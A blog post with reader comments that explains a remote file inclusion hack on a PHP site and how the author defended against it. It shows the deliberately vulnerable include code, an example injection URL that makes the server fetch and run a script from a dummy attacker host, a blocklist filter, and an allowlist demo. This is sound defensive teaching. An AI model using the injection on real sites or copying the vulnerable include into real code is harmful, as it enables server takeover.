Preventing URL Injection Attacks

Although I was supremely irritated that someone was hacking intermz and uploading malicious files (eBay phishing pages and the like) to the server, I have to give those hackers credit for the effectiveness and simplicity of their hack, what I will call a “URL injection” attack. (The more common name for it is remote file inclusion, or RFI. It differs from a SQL injection attack, which is another problem you should worry about; there is lots of good information on preventing SQL injection out there.) I am going to document how they did it here to help you web developers out there prevent it from happening to you.

First, let me briefly describe how the intermz site works. It follows a very simple “template/content” paradigm: I designed a single frame (template) that all other pages (content) are loaded into, so every page looks the same, and if I need to make a change I can make it to the template once and every page reflects it. I used a basic “page” parameter in the GET string to pass the name of the .php file to load into the template. It works like this:

Example URL:

http://www.intermz.com/default.php?page=home

The PHP code takes the “page” parameter, appends “.php” and requires the resulting file name without checking it (this is the vulnerable version, kept as it was):

$page = $_GET['page'];         // taken straight from the query string
require($page . '.php');       // whatever the client sent, plus ".php"

The gist of what the hackers did was to pass a page parameter that was the URL of a PHP script of their own:

http://www.intermz.com/default.php?page=http://www.hackerserver123.com/maliciousCode.php?

(Note: I’ve replaced the actual hack-script URL with a dummy URL so no one will go out there and try to use it.)

What this allows them to do is run their script on my server, with the permissions of my web server, letting them upload and delete files without needing FTP access. (See the screenshot below of what that looks like.) If you are a coder, you might have noticed that the require() above appends “.php” to whatever page is passed in, so it should have tried to load “…maliciousCode.php.php”, which would have failed. But if you look closely, you will notice that the injected URL ends with a “?”. This is the very clever part: the “.php” that my require() appends lands after the “?”, so it becomes a perfectly legal (although unused) query string, and the URL the hackers actually wanted is what gets fetched. Two things make this possible. First, require() is handed a URL instead of a file name, and PHP is willing to fetch it over HTTP when the allow_url_include setting (allow_url_fopen on PHP older than 5.2) is on. Second, the remote server hands back PHP source rather than executing it itself, so it is my PHP interpreter that runs the code.

So how do you stop this kind of attack?

Well, I built a filter to remove any part of the page parameter that might make it an outside URL:

$filter = array('http://', 'www', '.');
$replace = array('');                    // every match is replaced with nothing
$page = str_ireplace($filter, $replace, $_GET['page']);

So far, this has stopped the hacks.

A word of caution about this approach: it is a blocklist. It removes only the three tokens listed and passes everything else to require() untouched, so it stops the exact trick above but gives no guarantee about the next one, and it also breaks any legitimate page name that happens to contain a dot or “www”. The robust fix is the other way round: keep a fixed list of page names in the code, look the “page” parameter up in that list, and serve a 404 for anything not on it, so that no request content is ever concatenated into the require() path. As defence in depth, set allow_url_include = Off in php.ini (it is off by default on current PHP) so that include and require refuse URLs altogether, whatever the application does.
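The following is an added example, not code from the original post or the intermz site, that puts the three approaches side by side: the original concatenation that made the “?” trick work, the blocklist filter from this post, and an allowlist of page names. The page names and file paths in the allowlist are made up for illustration, and the inputs at the bottom are constructed (the hacker URL is the same dummy one used above). No file is actually included; each resolver only returns the path it would hand to require(), or null when it refuses the request.

```php
<?php
// Added example (not the original post's code). Shows what reaches require()
// under three different handlings of the ?page= parameter.
// Run offline with: php rfi_demo.php
declare(strict_types=1);

// 1. Original behaviour: whatever arrives in ?page= is used verbatim,
//    so a URL ending in "?" turns the appended ".php" into a query string.
function resolve_unfiltered(string $page): string
{
    return $page . '.php';
}

// 2. Blocklist from the post: strip the three tokens, keep the rest.
//    Anything the list does not mention is passed through unchanged.
function resolve_blocklist(string $page): string
{
    $filter = array('http://', 'www', '.');
    return str_ireplace($filter, '', $page) . '.php';
}

// 3. Allowlist: the request can only pick a key from this map. The file
//    paths live in the code (assumed names, for illustration only), so no
//    request content is ever part of the path given to require().
const PAGES = array(
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
);

function resolve_allowlist(string $page): ?string
{
    return PAGES[$page] ?? null;   // null: unknown page, serve a 404 instead
}

// Constructed sample inputs: a normal request, the attack from the post
// (dummy host), and a variant that uses a scheme the blocklist does not list.
$inputs = array(
    'home',
    'http://www.hackerserver123.com/maliciousCode.php?',
    'https://hackerserver123.com/maliciousCode.php?',
);

foreach ($inputs as $in) {
    printf("input:     %s\n", $in);
    printf("  original:  %s\n", resolve_unfiltered($in));
    printf("  blocklist: %s\n", resolve_blocklist($in));
    printf("  allowlist: %s\n\n", resolve_allowlist($in) ?? '(refused)');
}
```

For the attack URL, the “original” line prints the dummy URL with “.php” sitting harmlessly after the “?”, which is exactly why the hack worked; the “blocklist” line shows the filter mangling it; and the “allowlist” line refuses both hostile inputs while still mapping “home” to its file. The allowlist resolver is the one to drop into default.php: call it, and if it returns null send a 404 rather than falling back to the raw parameter.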

Hope this helps you guys!

PHP Hack Screenshot

Discussion

6 comments for “Preventing URL Injection Attacks”

  1. Thanks for the article it came in handy.

    I had something similar happening so was looking for a solution when I came across your article.

    A hacker had been using some sort of anonymous proxy script running dozens of times per day without me knowing. In effect the header and footer of my site showed but with a picture and link to a viagra sales page appearing in the middle. It was colour matched and everything!

    In the end I used the preg_match function to watch for anyone using “http://” in the search string and if a match is found they now get a redirect back to the IP address of origin.

    No sympathy here.

    Posted by Dave | May 21, 2008, 8:01 pm
  2. Glad this post was helpful (and thanks for letting me know so). It’s amazing how sophisticated these hackers are. You’d only wish they’d use their creativity in more productive ways.

    That’s actually a very clever and valiant idea - kick their garbage back at them. I think I will implement your technique. Thanks for it.

    I cruised your site priceranger.co.uk and would find it rather useful but for the fact that I’m in the US and shipping items like the new LCD flatscreen I have been craving would be cost prohibitive…I will, however, keep it in mind for smaller purchases.

    All the best.

    Posted by Ted Pin | May 21, 2008, 10:42 pm
    I’m not sure if it will succeed, as you can’t always post snippets of code; however, if it does, the code I used is below.

    Posted by Dave | May 22, 2008, 5:01 am
  4. Guess not. Well, if you do post your code somewhere, let me know and I will link to it.

    Posted by Ted Pin | May 22, 2008, 9:49 pm
  5. interesting site man

    Posted by bob | September 6, 2008, 6:44 pm
  6. Thanks, Bob =)

    Posted by Ted Pin | September 6, 2008, 7:10 pm